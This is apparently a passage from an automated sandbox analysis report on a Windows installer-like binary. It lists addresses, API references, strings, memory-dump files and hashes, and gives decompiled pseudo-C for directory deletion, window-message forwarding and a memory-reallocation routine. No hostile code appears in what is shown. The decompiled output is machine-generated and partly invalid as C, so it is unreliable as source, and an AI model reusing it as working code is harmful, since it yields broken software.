                                                                    0x00628e42
                                                                    0x00628e43
                                                                    0x00628e47
                                                                    0x00628e4a
                                                                    0x00628e4d
                                                                    0x00628e4f
                                                                    0x00628e53
                                                                    0x00628e54
                                                                    0x00628e59
                                                                    0x00628e5c
                                                                    0x00628e68
                                                                    0x00628e6d
                                                                    0x00628fa8
                                                                    0x00000000
                                                                    0x00628e7f
                                                                    0x00628e7f
                                                                    0x00628e82
                                                                    0x00628e90
                                                                    0x00628e9b
                                                                    0x00628ee8
                                                                    0x00628eec
                                                                    0x00628ef4
                                                                    0x00628ef7
                                                                    0x00628efe
                                                                    0x00628fac
                                                                    0x00628fae
                                                                    0x00628fb1
                                                                    0x00628fb4
                                                                    0x00628fc1
                                                                    0x00628fc1
                                                                    0x00628f09
                                                                    0x00628f0f
                                                                    0x00628f51
                                                                    0x00628f55
                                                                    0x00628f90
                                                                    0x00628f90
                                                                    0x00628f93
                                                                    0x00628fa1
                                                                    0x00000000
                                                                    0x00628fa1
                                                                    0x00628f5c
                                                                    0x00628f61
                                                                    0x00628f63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00628f65
                                                                    0x00628f6a
                                                                    0x00628f6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00628f6f
                                                                    0x00628f72
                                                                    0x00628f80
                                                                    0x00628f89
                                                                    0x00000000
                                                                    0x00628f89
                                                                    0x00628f11
                                                                    0x00628f14
                                                                    0x00628f22
                                                                    0x00628f35
                                                                    0x00628f3f
                                                                    0x00628f4a
                                                                    0x00000000
                                                                    0x00628f4a
                                                                    0x00628e9d
                                                                    0x00628ea3
                                                                    0x00628eb2
                                                                    0x00628ebd
                                                                    0x00628ec2
                                                                    0x00628ec4
                                                                    0x00628ed7
                                                                    0x00628ec6
                                                                    0x00628ecb
                                                                    0x00628ecb
                                                                    0x00000000
                                                                    0x00628ec4
                                                                    0x00628ea9
                                                                    0x00628eae
                                                                    0x00628eb0
                                                                    0x00628ee3
                                                                    0x00000000
                                                                    0x00628ee3
                                                                    0x00000000
                                                                    0x00628eb0

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00628FC2,?,00000000,?), ref: 00628F04
                                                                      • Part of subcall function 0060DFAC: FindClose.KERNEL32(000000FF,0060E0A1), ref: 0060E090
                                                                    Strings
                                                                    • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00628EDE
                                                                    • Failed to delete directory (%d)., xrefs: 00628F9C
                                                                    • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00628F7B
                                                                    • Stripped read-only attribute., xrefs: 00628EC6
                                                                    • Deleting directory: %s, xrefs: 00628E8B
                                                                    • Failed to strip read-only attribute., xrefs: 00628ED2
                                                                    • Failed to delete directory (%d). Will retry later., xrefs: 00628F1D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseErrorFindLast
                                                                    • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                    • API String ID: 754982922-1448842058
                                                                    • Opcode ID: 7fc0813c7db3ed8f80165e3b8539aa30754377e7929e0533272f97a4bbcf9ceb
                                                                    • Instruction ID: bb024c1df45f9af0c8d848e5c22ededdbf4d41f71593f538bf5593c1374477db
                                                                    • Opcode Fuzzy Hash: 7fc0813c7db3ed8f80165e3b8539aa30754377e7929e0533272f97a4bbcf9ceb
                                                                    • Instruction Fuzzy Hash: B5410330A11A285ECB00EB68DD053EE77E7AF84310F11842EB411D3382CFB48E45CBA6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005B8390(void* __eax, struct HWND__** __edx) {
				long _v20;
				intOrPtr _t17;
				intOrPtr _t30;
				void* _t46;
				void* _t50;
				struct HWND__** _t51;
				struct HWND__* _t52;
				struct HWND__* _t53;
				void* _t54;
				DWORD* _t55;

				_t55 = _t54 + 0xfffffff8;
				_t51 = __edx;
				_t50 = __eax;
				_t46 = 0;
				_t17 =  *((intOrPtr*)(__edx + 4));
				if(_t17 < 0x100 || _t17 > 0x109) {
					L19:
					return _t46;
				} else {
					_t52 = GetCapture();
					if(_t52 != 0) {
						GetWindowThreadProcessId(_t52, _t55);
						GetWindowThreadProcessId( *(_t50 + 0x188),  &_v20);
						if( *_t55 == _v20 && SendMessageW(_t52, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
							_t46 = 1;
						}
						goto L19;
					}
					_t53 =  *_t51;
					_t30 =  *((intOrPtr*)(_t50 + 0x58));
					if(_t30 == 0 || _t53 !=  *((intOrPtr*)(_t30 + 0x3c4))) {
						L7:
						if(E0050E9B4(_t53) == 0 && _t53 != 0) {
							_t53 = GetParent(_t53);
							goto L7;
						}
						if(_t53 == 0) {
							_t53 =  *_t51;
						}
						goto L11;
					} else {
						_t53 = E0051B414(_t30);
						L11:
						if(IsWindowUnicode(_t53) == 0) {
							if(SendMessageA(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
								_t46 = 1;
							}
						} else {
							if(SendMessageW(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
								_t46 = 1;
							}
						}
						goto L19;
					}
				}
			}













                                                                    0x005b8394
                                                                    0x005b8397
                                                                    0x005b8399
                                                                    0x005b839b
                                                                    0x005b839d
                                                                    0x005b83a5
                                                                    0x005b847e
                                                                    0x005b8486
                                                                    0x005b83b6
                                                                    0x005b83bb
                                                                    0x005b83bf
                                                                    0x005b8442
                                                                    0x005b8453
                                                                    0x005b845f
                                                                    0x005b847c
                                                                    0x005b847c
                                                                    0x00000000
                                                                    0x005b845f
                                                                    0x005b83c1
                                                                    0x005b83c3
                                                                    0x005b83c8
                                                                    0x005b83e3
                                                                    0x005b83ec
                                                                    0x005b83e1
                                                                    0x00000000
                                                                    0x005b83e1
                                                                    0x005b83f4
                                                                    0x005b83f6
                                                                    0x005b83f6
                                                                    0x00000000
                                                                    0x005b83d2
                                                                    0x005b83d7
                                                                    0x005b83f8
                                                                    0x005b8400
                                                                    0x005b843a
                                                                    0x005b843c
                                                                    0x005b843c
                                                                    0x005b8402
                                                                    0x005b841b
                                                                    0x005b841d
                                                                    0x005b841d
                                                                    0x005b841b
                                                                    0x00000000
                                                                    0x005b8400
                                                                    0x005b83c8

                                                                    APIs
                                                                    • GetCapture.USER32 ref: 005B83B6
                                                                    • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                                    • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                    • String ID:
                                                                    • API String ID: 1994056952-0
                                                                    • Opcode ID: 60d5d18c6536e8f3e7333ea3e87ccb02092badd8fb76314d68d3832b537e943d
                                                                    • Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
                                                                    • Opcode Fuzzy Hash: 60d5d18c6536e8f3e7333ea3e87ccb02092badd8fb76314d68d3832b537e943d
                                                                    • Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00405F80(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00405A04(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E004055C0(_t202, _t218, _t150);
										E00405D88(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00405A04(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00405590(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E00405D88(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00405A04(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00405590(_t217, _t207, _t109);
									E00405D88(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x6cf05d;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E004055DC(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E0040561C(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x6cfaec = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x6cfaec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x6cf98d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x6cfaec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x6cfaec = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x6cf05d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x6cfaec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x6cf98d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x6cfaec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E004055DC(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E0040561C(_t217 + _t238, _t174, _t161);
									}
									 *0x6cfaec = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00405A04(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E004055C0(_t217, _t213, _t140);
											E00405D88(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00405A04((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E00405D88(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00405A04(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E00405D88(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                                    0x00405f80
                                                                    0x00405f80
                                                                    0x00405f80
                                                                    0x00405f88
                                                                    0x00405f8a
                                                                    0x00406018
                                                                    0x0040601b
                                                                    0x00406288
                                                                    0x00406289
                                                                    0x0040628a
                                                                    0x0040628d
                                                                    0x004058b8
                                                                    0x004058b9
                                                                    0x004058ba
                                                                    0x004058bb
                                                                    0x004058bc
                                                                    0x004058bf
                                                                    0x004058c1
                                                                    0x004058c8
                                                                    0x004058d1
                                                                    0x004058d6
                                                                    0x004059bd
                                                                    0x004059bf
                                                                    0x004059d2
                                                                    0x004059d4
                                                                    0x004059d6
                                                                    0x004059d8
                                                                    0x004059de
                                                                    0x004059e2
                                                                    0x004059e2
                                                                    0x004059e5
                                                                    0x004059e5
                                                                    0x004059ee
                                                                    0x004059f5
                                                                    0x004059f5
                                                                    0x004059c1
                                                                    0x004059c1
                                                                    0x004059c6
                                                                    0x004059c6
                                                                    0x004058dc
                                                                    0x004058e5
                                                                    0x004058eb
                                                                    0x004058e7
                                                                    0x004058e7
                                                                    0x004058e7
                                                                    0x004058f7
                                                                    0x00405906
                                                                    0x00405913
                                                                    0x00405983
                                                                    0x0040598a
                                                                    0x0040598c
                                                                    0x0040598e
                                                                    0x00405990
                                                                    0x00405996
                                                                    0x0040599a
                                                                    0x0040599a
                                                                    0x0040599d
                                                                    0x0040599d
                                                                    0x004059ad
                                                                    0x004059b4
                                                                    0x004059b4
                                                                    0x00405915
                                                                    0x00405915
                                                                    0x00405921
                                                                    0x00405927
                                                                    0x00000000
                                                                    0x00405929
                                                                    0x0040593a
                                                                    0x0040593e
                                                                    0x00405940
                                                                    0x00405940
                                                                    0x00405956
                                                                    0x00000000
                                                                    0x0040596e
                                                                    0x00405970
                                                                    0x00405973
                                                                    0x0040597c
                                                                    0x0040597f
                                                                    0x0040597f
                                                                    0x00405956
                                                                    0x00405927
                                                                    0x00405913
                                                                    0x00405a03
                                                                    0x00406293
                                                                    0x00406293
                                                                    0x00406295
                                                                    0x00406295
                                                                    0x00406021
                                                                    0x00406023
                                                                    0x00406026
                                                                    0x00406027
                                                                    0x0040602a
                                                                    0x0040602d
                                                                    0x00406030
                                                                    0x00406032
                                                                    0x00406033
                                                                    0x00406148
                                                                    0x0040614b
                                                                    0x0040614d
                                                                    0x00406240
                                                                    0x0040624b
                                                                    0x00406252
                                                                    0x00406254
                                                                    0x00406257
                                                                    0x0040625c
                                                                    0x0040625d
                                                                    0x0040625f
                                                                    0x00000000
                                                                    0x00406261
                                                                    0x00406261
                                                                    0x00406267
                                                                    0x00406269
                                                                    0x00406269
                                                                    0x0040626c
                                                                    0x00406274
                                                                    0x0040627b
                                                                    0x00406286
                                                                    0x00406286
                                                                    0x00406153
                                                                    0x00406153
                                                                    0x00406156
                                                                    0x00406159
                                                                    0x0040615b
                                                                    0x00000000
                                                                    0x00406161
                                                                    0x00406161
                                                                    0x00406168
                                                                    0x004061c5
                                                                    0x004061c5
                                                                    0x004061ca
                                                                    0x004061d0
                                                                    0x004061d5
                                                                    0x004061d6
                                                                    0x004061d6
                                                                    0x004061e2
                                                                    0x004061f3
                                                                    0x004061f9
                                                                    0x004061f9
                                                                    0x004061fb
                                                                    0x00406208
                                                                    0x0040620f
                                                                    0x00406213
                                                                    0x00406215
                                                                    0x0040621b
                                                                    0x0040621d
                                                                    0x0040621f
                                                                    0x0040621f
                                                                    0x004061fd
                                                                    0x004061fd
                                                                    0x00406201
                                                                    0x00406201
                                                                    0x00406224
                                                                    0x00406224
                                                                    0x00406226
                                                                    0x00406229
                                                                    0x00406230
                                                                    0x00406232
                                                                    0x00406236
                                                                    0x0040616a
                                                                    0x0040616a
                                                                    0x0040616f
                                                                    0x00406177
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406179
                                                                    0x0040617b
                                                                    0x00406182
                                                                    0x00000000
                                                                    0x00406184
                                                                    0x00406188
                                                                    0x0040618d
                                                                    0x0040618e
                                                                    0x00406194
                                                                    0x0040619c
                                                                    0x004061a2
                                                                    0x004061a7
                                                                    0x004061a8
                                                                    0x00000000
                                                                    0x004061a8
                                                                    0x0040619c
                                                                    0x00000000
                                                                    0x00406182
                                                                    0x004061b1
                                                                    0x004061b4
                                                                    0x004061b7
                                                                    0x004061b9
                                                                    0x00406239
                                                                    0x00406239
                                                                    0x00000000
                                                                    0x004061bb
                                                                    0x004061bb
                                                                    0x004061be
                                                                    0x004061c1
                                                                    0x004061c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004061c3
                                                                    0x004061b9
                                                                    0x00406168
                                                                    0x0040615b
                                                                    0x00406039
                                                                    0x0040603c
                                                                    0x0040603e
                                                                    0x00406048
                                                                    0x0040604e
                                                                    0x00406065
                                                                    0x00406065
                                                                    0x00406071
                                                                    0x00406077
                                                                    0x00406079
                                                                    0x00406080
                                                                    0x00406082
                                                                    0x00406087
                                                                    0x0040608f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406091
                                                                    0x00406093
                                                                    0x0040609a
                                                                    0x00000000
                                                                    0x0040609c
                                                                    0x0040609f
                                                                    0x004060a4
                                                                    0x004060aa
                                                                    0x004060b2
                                                                    0x004060b7
                                                                    0x004060bc
                                                                    0x00000000
                                                                    0x004060bc
                                                                    0x004060b2
                                                                    0x00000000
                                                                    0x0040609a
                                                                    0x004060c5
                                                                    0x004060c5
                                                                    0x004060c5
                                                                    0x004060ca
                                                                    0x004060cd
                                                                    0x004060cf
                                                                    0x004060d2
                                                                    0x004060d5
                                                                    0x004060e0
                                                                    0x004060e2
                                                                    0x004060e5
                                                                    0x004060e7
                                                                    0x004060e9
                                                                    0x004060ef
                                                                    0x004060f1
                                                                    0x004060f1
                                                                    0x004060d7
                                                                    0x004060da
                                                                    0x004060da
                                                                    0x004060f6
                                                                    0x004060fc
                                                                    0x00406100
                                                                    0x00406106
                                                                    0x0040610d
                                                                    0x0040610d
                                                                    0x00406112
                                                                    0x0040611f
                                                                    0x00406050
                                                                    0x00406050
                                                                    0x00406056
                                                                    0x00406120
                                                                    0x00406124
                                                                    0x00406129
                                                                    0x0040612b
                                                                    0x0040612d
                                                                    0x00406135
                                                                    0x0040613c
                                                                    0x00406141
                                                                    0x00406141
                                                                    0x00406147
                                                                    0x0040605c
                                                                    0x0040605c
                                                                    0x00406061
                                                                    0x00406063
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406063
                                                                    0x00406056
                                                                    0x00406040
                                                                    0x00406040
                                                                    0x00406044
                                                                    0x00406044
                                                                    0x0040603e
                                                                    0x00406033
                                                                    0x00405f90
                                                                    0x00405f90
                                                                    0x00405f92
                                                                    0x00405f96
                                                                    0x00405f99
                                                                    0x00405f9b
                                                                    0x00405fd4
                                                                    0x00405fd8
                                                                    0x00405fd9
                                                                    0x00405fdb
                                                                    0x00405fdd
                                                                    0x00405fdf
                                                                    0x00405fe2
                                                                    0x00405fe4
                                                                    0x00405fe6
                                                                    0x00405feb
                                                                    0x00405fed
                                                                    0x00405fef
                                                                    0x00405ff5
                                                                    0x00405ff7
                                                                    0x00405ff7
                                                                    0x00405ffe
                                                                    0x00405ffe
                                                                    0x00406001
                                                                    0x00406003
                                                                    0x0040600c
                                                                    0x00406011
                                                                    0x00406011
                                                                    0x00406013
                                                                    0x00406014
                                                                    0x00406015
                                                                    0x00406016
                                                                    0x00405f9d
                                                                    0x00405f9d
                                                                    0x00405fa4
                                                                    0x00405fa6
                                                                    0x00405fac
                                                                    0x00405fae
                                                                    0x00405fb0
                                                                    0x00405fb5
                                                                    0x00405fb7
                                                                    0x00405fb9
                                                                    0x00405fbb
                                                                    0x00405fbd
                                                                    0x00405fc8
                                                                    0x00405fcd
                                                                    0x00405fcd
                                                                    0x00405fcf
                                                                    0x00405fd0
                                                                    0x00405fd1
                                                                    0x00405fa8
                                                                    0x00405fa8
                                                                    0x00405fa9
                                                                    0x00405faa
                                                                    0x00405faa
                                                                    0x00405fa6
                                                                    0x00405f9b

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
